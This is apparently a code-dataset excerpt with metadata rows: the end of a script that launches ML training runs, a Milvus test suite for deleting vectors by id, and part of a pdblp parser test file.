"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_lasso]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@clf_skl_lr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_libfm]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_keras_dnn]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_rgf]",
## svd100_and_bow_Jun23 (Low)
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_xgb_tree]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_rf]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_ridge]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_lasso]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@clf_skl_lr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_libfm]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_keras_dnn]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_rgf]",
## svd100_and_bow_Jun27 (High)
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@reg_skl_ridge]",
]
feat_names = [
## LSA_and_stats_feat_Jun09 (Low)
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_xgb_tree]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_ridge]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_lasso]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_rf]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@LSA_and_stats_feat_Jun09]_[Model@reg_skl_svr]",
## LSA_svd150_and_Jaccard_coef_Jun14 (Low)
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@LSA_svd150_and_Jaccard_coef_Jun14]_[Model@reg_keras_dnn]",
## svd100_and_bow_Jun23 (Low)
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_etr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_gbm]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_skl_svr]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun23]_[Model@reg_keras_dnn]",
## svd100_and_bow_Jun27 (High)
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@reg_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@cocr_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@kappa_xgb_linear]",
"[Pre@solution]_[Feat@svd100_and_bow_Jun27]_[Model@reg_skl_ridge]",
]
for feat_name in feat_names:
cmd = "python ./train_model.py %s" % feat_name
os.system( cmd ) | 57.902174 | 84 | 0.801952 | 860 | 5,327 | 4.317442 | 0.05814 | 0.198492 | 0.270671 | 0.198761 | 0.974414 | 0.974414 | 0.971452 | 0.962295 | 0.937786 | 0.91624 | 0 | 0.058525 | 0.037732 | 5,327 | 92 | 85 | 57.902174 | 0.665821 | 0.047118 | 0 | 0.56 | 0 | 0 | 0.905534 | 0.900395 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013333 | 0 | 0.013333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c4a810ed99b9ea79a590b476eeb94ebf18141b4d | 22,401 | py | Python | tests/milvus_python_test/test_delete_vectors.py | yamasite/milvus | ee3a65a811b5487a92b39418540780fd19f378dc | [
"Apache-2.0"
] | null | null | null | tests/milvus_python_test/test_delete_vectors.py | yamasite/milvus | ee3a65a811b5487a92b39418540780fd19f378dc | [
"Apache-2.0"
] | null | null | null | tests/milvus_python_test/test_delete_vectors.py | yamasite/milvus | ee3a65a811b5487a92b39418540780fd19f378dc | [
"Apache-2.0"
] | 1 | 2022-02-28T08:43:42.000Z | 2022-02-28T08:43:42.000Z | import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
collection_id = "test_delete"
DELETE_TIMEOUT = 60
nprobe = 1
epsilon = 0.001
tag = "1970-01-01"
top_k = 1
nb = 6000
class TestDeleteBase:
"""
******************************************************************
The following cases are used to test `delete_by_id` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] not in [IndexType.IVF_SQ8, IndexType.IVFLAT, IndexType.FLAT, IndexType.IVF_PQ, IndexType.HNSW]:
pytest.skip("Only support index_type: flat/ivf_flat/ivf_sq8/hnsw/ivf_pq")
else:
pytest.skip("Only support CPU mode")
return request.param
def test_delete_vector_search(self, connect, collection, get_simple_index):
'''
target: test delete vector
method: add vector and delete
expected: status ok, vector deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.delete_by_id(collection, ids)
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, vector, params=search_param)
logging.getLogger().info(res)
assert status.OK()
assert len(res) == 0
def test_delete_vector_multi_same_ids(self, connect, collection, get_simple_index):
'''
target: test delete vector, with some same ids
method: add vector and delete
expected: status ok, vector deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vectors(nb, dim)
connect.add_vectors(collection, vectors, ids=[1 for i in range(nb)])
status = connect.flush([collection])
# Bloom filter error
assert status.OK()
status = connect.delete_by_id(collection, [1])
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, [vectors[0]], params=search_param)
logging.getLogger().info(res)
assert status.OK()
assert len(res) == 0
def test_delete_vector_collection_count(self, connect, collection):
'''
target: test delete vector
method: add vector and delete
expected: status ok, vector deleted
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.delete_by_id(collection, ids)
assert status.OK()
status = connect.flush([collection])
status, res = connect.count_collection(collection)
assert status.OK()
assert res == 0
def test_delete_vector_collection_count_no_flush(self, connect, collection):
'''
target: test delete vector
method: add vector and delete, no flush(using auto flush)
expected: status ok, vector deleted
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.delete_by_id(collection, ids)
assert status.OK()
time.sleep(2)
status, res = connect.count_collection(collection)
assert status.OK()
assert res == 0
def test_delete_vector_id_not_exised(self, connect, collection, get_simple_index):
'''
target: test delete vector, params vector_id not existed
method: add vector and delete
expected: status ok, search with vector have result
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.delete_by_id(collection, [0])
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, vector, params=search_param)
assert status.OK()
assert res[0][0].id == ids[0]
def test_delete_vector_collection_not_existed(self, connect, collection):
'''
target: test delete vector, params collection_name not existed
method: add vector and delete
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
collection_new = gen_unique_str()
status = connect.delete_by_id(collection_new, [0])
assert not status.OK()
def test_add_vectors_delete_vector(self, connect, collection, get_simple_index):
'''
method: add vectors and delete
expected: status ok, vectors deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
assert res[0][0].distance > epsilon
assert res[1][0].distance < epsilon
assert res[1][0].id == ids[1]
assert res[2][0].distance > epsilon
def test_create_index_after_delete(self, connect, collection, get_simple_index):
'''
method: add vectors and delete, then create index
expected: status ok, vectors deleted, index created
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
logging.getLogger().info(ids[0])
logging.getLogger().info(ids[1])
logging.getLogger().info(ids[-1])
assert res[0][0].id != ids[0]
assert res[1][0].id == ids[1]
assert res[2][0].id != ids[-1]
def test_add_vector_after_delete(self, connect, collection, get_simple_index):
'''
method: add vectors and delete, then add vector
expected: status ok, vectors deleted, vector added
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
status, tmp_ids = connect.add_vectors(collection, [vectors[0], vectors[-1]])
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
assert res[0][0].id == tmp_ids[0]
assert res[0][0].distance < epsilon
assert res[1][0].distance < epsilon
assert res[2][0].id == tmp_ids[-1]
assert res[2][0].distance < epsilon
def test_delete_multiable_times(self, connect, collection):
'''
method: add vectors and delete id serveral times
expected: status ok, vectors deleted, and status ok for next delete operation
'''
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
for i in range(10):
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
def test_delete_no_flush_multiable_times(self, connect, collection):
'''
method: add vectors and delete id serveral times
expected: status ok, vectors deleted, and status ok for next delete operation
'''
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
for i in range(10):
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
assert status.OK()
class TestDeleteIndexedVectors:
"""
******************************************************************
The following cases are used to test `delete_by_id` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] not in [IndexType.IVF_SQ8, IndexType.IVFLAT, IndexType.FLAT, IndexType.IVF_PQ, IndexType.HNSW]:
pytest.skip("Only support index_type: flat/ivf_flat/ivf_sq8")
else:
pytest.skip("Only support CPU mode")
return request.param
def test_delete_vectors_after_index_created_search(self, connect, collection, get_simple_index):
'''
target: test delete vector after index created
method: add vector, create index and delete vector
expected: status ok, vector deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status = connect.delete_by_id(collection, ids)
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, vector, params=search_param)
logging.getLogger().info(res)
assert status.OK()
assert len(res) == 0
def test_add_vectors_delete_vector(self, connect, collection, get_simple_index):
'''
method: add vectors and delete
expected: status ok, vectors deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vectors = gen_vector(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.flush([collection])
assert status.OK()
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(collection, delete_ids)
assert status.OK()
status = connect.flush([collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(ids[0])
logging.getLogger().info(ids[1])
logging.getLogger().info(ids[-1])
logging.getLogger().info(res)
assert res[0][0].id != ids[0]
assert res[1][0].id == ids[1]
assert res[2][0].id != ids[-1]
class TestDeleteBinary:
"""
******************************************************************
The following cases are used to test `delete_by_id` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_delete_vector_search(self, connect, jac_collection, get_simple_index):
'''
target: test delete vector
method: add vector and delete
expected: status ok, vector deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
tmp, vector = gen_binary_vectors(1, dim)
status, ids = connect.add_vectors(jac_collection, vector)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
status = connect.delete_by_id(jac_collection, ids)
assert status.OK()
status = connect.flush([jac_collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(jac_collection, top_k, vector, params=search_param)
logging.getLogger().info(res)
assert status.OK()
assert len(res) == 0
assert status.OK()
assert len(res) == 0
# TODO: soft delete
def test_delete_vector_collection_count(self, connect, jac_collection):
'''
target: test delete vector
method: add vector and delete
expected: status ok, vector deleted
'''
tmp, vector = gen_binary_vectors(1, dim)
status, ids = connect.add_vectors(jac_collection, vector)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
status = connect.delete_by_id(jac_collection, ids)
assert status.OK()
status = connect.flush([jac_collection])
status, res = connect.count_collection(jac_collection)
assert status.OK()
assert res == 0
def test_delete_vector_id_not_exised(self, connect, jac_collection, get_simple_index):
'''
target: test delete vector, params vector_id not existed
method: add vector and delete
expected: status ok, search with vector have result
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
tmp, vector = gen_binary_vectors(1, dim)
status, ids = connect.add_vectors(jac_collection, vector)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
status = connect.delete_by_id(jac_collection, [0])
assert status.OK()
status = connect.flush([jac_collection])
status = connect.flush([jac_collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(jac_collection, top_k, vector, params=search_param)
assert status.OK()
assert res[0][0].id == ids[0]
def test_delete_vector_collection_not_existed(self, connect, jac_collection):
'''
target: test delete vector, params collection_name not existed
method: add vector and delete
expected: status not ok
'''
tmp, vector = gen_binary_vectors(1, dim)
status, ids = connect.add_vectors(jac_collection, vector)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
collection_new = gen_unique_str()
status = connect.delete_by_id(collection_new, [0])
collection_new = gen_unique_str()
status = connect.delete_by_id(collection_new, [0])
assert not status.OK()
def test_add_vectors_delete_vector(self, connect, jac_collection, get_simple_index):
'''
method: add vectors and delete
expected: status ok, vectors deleted
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
tmp, vectors = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(jac_collection, vectors)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(jac_collection, delete_ids)
assert status.OK()
status = connect.flush([jac_collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(jac_collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
assert res[0][0].id != ids[0]
assert res[1][0].id == ids[1]
assert res[2][0].id != ids[-1]
def test_add_after_delete_vector(self, connect, jac_collection, get_simple_index):
'''
method: add vectors and delete, add
expected: status ok, vectors added
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
tmp, vectors = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(jac_collection, vectors)
assert status.OK()
status = connect.flush([jac_collection])
assert status.OK()
delete_ids = [ids[0], ids[-1]]
query_vecs = [vectors[0], vectors[1], vectors[-1]]
status = connect.delete_by_id(jac_collection, delete_ids)
assert status.OK()
status = connect.flush([jac_collection])
status, tmp_ids = connect.add_vectors(jac_collection, [vectors[0], vectors[-1]])
assert status.OK()
status = connect.flush([jac_collection])
search_param = get_search_param(index_type)
status, res = connect.search_vectors(jac_collection, top_k, query_vecs, params=search_param)
assert status.OK()
logging.getLogger().info(res)
assert res[0][0].id == tmp_ids[0]
assert res[1][0].id == ids[1]
assert res[2][0].id == tmp_ids[-1]
assert res[2][0].id == tmp_ids[-1]
class TestDeleteIdsIngalid(object):
single_vector = gen_single_vector(dim)
"""
Test adding vectors with invalid vectors
"""
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def gen_invalid_id(self, request):
yield request.param
@pytest.mark.level(1)
def test_delete_vector_id_invalid(self, connect, collection, gen_invalid_id):
invalid_id = gen_invalid_id
with pytest.raises(Exception) as e:
status = connect.delete_by_id(collection, [invalid_id])
@pytest.mark.level(2)
def test_delete_vector_ids_invalid(self, connect, collection, gen_invalid_id):
invalid_id = gen_invalid_id
with pytest.raises(Exception) as e:
status = connect.delete_by_id(collection, [1, invalid_id])
class TestCollectionNameInvalid(object):
"""
Test adding vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_delete_vectors_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
status = connect.delete_by_id(collection_name, [1])
assert not status.OK()
| 39.859431 | 138 | 0.628186 | 2,704 | 22,401 | 4.988905 | 0.057692 | 0.061675 | 0.0851 | 0.074129 | 0.91957 | 0.90252 | 0.895626 | 0.878206 | 0.865678 | 0.858858 | 0 | 0.010541 | 0.250391 | 22,401 | 561 | 139 | 39.930481 | 0.792818 | 0.118745 | 0 | 0.814458 | 0 | 0 | 0.02817 | 0.002854 | 0 | 0 | 0 | 0.001783 | 0.281928 | 1 | 0.06506 | false | 0 | 0.021687 | 0 | 0.108434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c4b5d418380d7c9d997e360a147aaa04bf185c48 | 20,886 | py | Python | pdblp/tests/test_parser.py | MosheVai/pdblp | 82819186c3d49d9daa94f0c59cdef75678106cac | [
"MIT"
] | null | null | null | pdblp/tests/test_parser.py | MosheVai/pdblp | 82819186c3d49d9daa94f0c59cdef75678106cac | [
"MIT"
] | null | null | null | pdblp/tests/test_parser.py | MosheVai/pdblp | 82819186c3d49d9daa94f0c59cdef75678106cac | [
"MIT"
] | null | null | null | import unittest
from pdblp import parser
class TestParser(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_historical_data_request_empty(self):
test_str = """
HistoricalDataRequest = {
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest": {}}]
self.assertEqual(res, exp_res)
def test_historical_data_request_two_empty(self):
test_str = """
HistoricalDataRequest = {
}
HistoricalDataRequest = {
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest": {}},
{"HistoricalDataRequest": {}}]
self.assertEqual(res, exp_res)
def test_historical_data_request_one_security_one_field_one_date(self):
test_str = """
HistoricalDataRequest = {
securities[] = {
"SPY US Equity"
}
fields[] = {
"PX_LAST"
}
startDate = "20150630"
endDate = "20150630"
overrides[] = {
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest":
{"securities": ["SPY US Equity"],
"fields": ["PX_LAST"],
"startDate": "20150630",
"endDate": "20150630",
"overrides": []}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_one_security_one_field_one_date(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42}}] # NOQA
}
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_one_security_one_field_multi_date(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
}
fieldData = {
date = 2015-06-30
PX_LAST = 205.850000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 205.85}}] # NOQA
}
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_request_two_securities_one_field(self):
test_str = """
HistoricalDataRequest = {
securities[] = {
"SPY US Equity", "TLT US Equity"
}
fields[] = {
"PX_LAST"
}
startDate = "20150629"
endDate = "20150630"
overrides[] = {
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest":
{"securities": ["SPY US Equity", "TLT US Equity"],
"fields": ["PX_LAST"],
"startDate": "20150629",
"endDate": "20150630",
"overrides": []}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_two_securities_one_field(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
}
fieldData = {
date = 2015-06-30
PX_LAST = 205.850000
}
}
}
}
HistoricalDataResponse = {
securityData = {
security = "TLT US Equity"
eidData[] = {
}
sequenceNumber = 1
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 118.280000
}
fieldData = {
date = 2015-06-30
PX_LAST = 117.460000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [
{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 205.85}}] # NOQA
}
}
},
{"HistoricalDataResponse":
{"securityData":
{"security": "TLT US Equity",
"eidData": [],
"sequenceNumber": 1,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 118.28}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 117.46}}] # NOQA
}
}
}
]
self.assertEqual(res, exp_res)
def test_historical_data_request_one_security_two_fields(self):
test_str = """
HistoricalDataRequest = {
securities[] = {
"SPY US Equity"
}
fields[] = {
"PX_LAST", "VOLUME"
}
startDate = "20150629"
endDate = "20150630"
overrides[] = {
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataRequest":
{"securities": ["SPY US Equity"],
"fields": ["PX_LAST", "VOLUME"],
"startDate": "20150629",
"endDate": "20150630",
"overrides": []}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_one_security_two_fields(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
VOLUME = 202621332.000000
}
fieldData = {
date = 2015-06-30
PX_LAST = 205.850000
VOLUME = 182925106.000000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42, "VOLUME": 202621332}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 205.85, "VOLUME": 182925106}}] # NOQA
}
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_request_override(self):
test_str = """
ReferenceDataRequest = {
securities[] = {
"AUD Curncy"
}
fields[] = {
"SETTLE_DT"
}
overrides[] = {
overrides = {
fieldId = "REFERENCE_DATE"
value = "20161010"
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataRequest":
{"securities": ["AUD Curncy"],
"fields": ["SETTLE_DT"],
"overrides": [{"overrides": {"fieldId": "REFERENCE_DATE", "value": "20161010"}}] # NOQA
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_response_override(self):
test_str = """
ReferenceDataResponse = {
securityData[] = {
securityData = {
security = "AUD Curncy"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 0
fieldData = {
SETTLE_DT = 2016-10-12
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataResponse":
{"securityData":
[{"securityData":
{"security": "AUD Curncy",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 0,
"fieldData": {"SETTLE_DT": "2016-10-12"}
}
}
]
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_response_two_securities(self):
test_str = """
ReferenceDataResponse = {
securityData[] = {
securityData = {
security = "AUD Curncy"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 0
fieldData = {
SETTLE_DT = 2017-05-23
}
}
securityData = {
security = "CAD Curncy"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 1
fieldData = {
SETTLE_DT = 2017-05-23
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataResponse":
{"securityData":
[{"securityData":
{"security": "AUD Curncy",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 0,
"fieldData": {"SETTLE_DT": "2017-05-23"}
}
},
{"securityData":
{"security": "CAD Curncy",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 1,
"fieldData": {"SETTLE_DT": "2017-05-23"}
}
}
]
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_response_futures_chain(self):
